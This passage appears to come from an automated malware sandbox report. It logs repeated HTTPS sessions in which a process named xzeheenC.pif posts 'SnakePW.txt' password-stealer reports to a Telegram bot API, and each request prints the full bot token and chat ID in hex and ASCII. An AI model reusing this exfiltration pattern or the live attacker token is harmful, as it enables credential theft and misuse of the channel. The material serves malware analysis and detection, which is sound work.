                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:24 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 39 34 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 31 30 33 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418941,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535103,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      69192.168.2.550020149.154.167.2204432140C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:18:25 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd2228c5d66ead
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:25 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 32 32 38 63 35 64 36 36 65 61 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 37 3a 30 35 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd2228c5d66eadContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:05Client IP:
                                                                                                                      2024-12-18 15:18:26 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:26 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:26 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 39 34 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 31 30 36 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418946,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535106,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      70192.168.2.550022149.154.167.220443432C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:18:25 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd224dea6ac3fc
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:25 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 32 34 64 65 61 36 61 63 33 66 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 37 3a 30 30 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd224dea6ac3fcContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:00Client IP:
                                                                                                                      2024-12-18 15:18:26 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:26 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:26 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 39 34 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 31 30 36 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418947,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535106,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      71192.168.2.550021149.154.167.2204436656C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:18:25 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd2410d566cb44
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:25 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 34 31 30 64 35 36 36 63 62 34 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 36 3a 34 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd2410d566cb44Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:16:48Client IP:
                                                                                                                      2024-12-18 15:18:26 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:26 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:26 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 39 34 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 31 30 36 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418949,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535106,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      72192.168.2.550028149.154.167.2204432140C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:18:27 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd2253ee1debeb
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:27 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 32 35 33 65 65 31 64 65 62 65 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 37 3a 30 35 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd2253ee1debebContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:05Client IP:
                                                                                                                      2024-12-18 15:18:28 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:28 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:28 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 39 35 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 31 30 38 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418952,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535108,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      73192.168.2.550029149.154.167.220443432C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:18:27 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd227b407d5dfd
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:27 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 32 37 62 34 30 37 64 35 64 66 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 37 3a 30 30 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd227b407d5dfdContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:00Client IP:
                                                                                                                      2024-12-18 15:18:28 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:28 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:28 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 39 35 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 31 30 38 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418953,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535108,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      74192.168.2.550030149.154.167.2204436656C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:18:27 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd2470cc4c7c4c
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:27 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 34 37 30 63 63 34 63 37 63 34 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 36 3a 34 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd2470cc4c7c4cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:16:48Client IP:
                                                                                                                      2024-12-18 15:18:28 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:28 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:28 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 39 35 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 31 30 38 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418955,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535108,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      75192.168.2.550037149.154.167.2204432140C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:18:29 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd228686aed571
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:29 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 32 38 36 38 36 61 65 64 35 37 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 37 3a 30 35 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd228686aed571Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:05Client IP:
                                                                                                                      2024-12-18 15:18:30 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
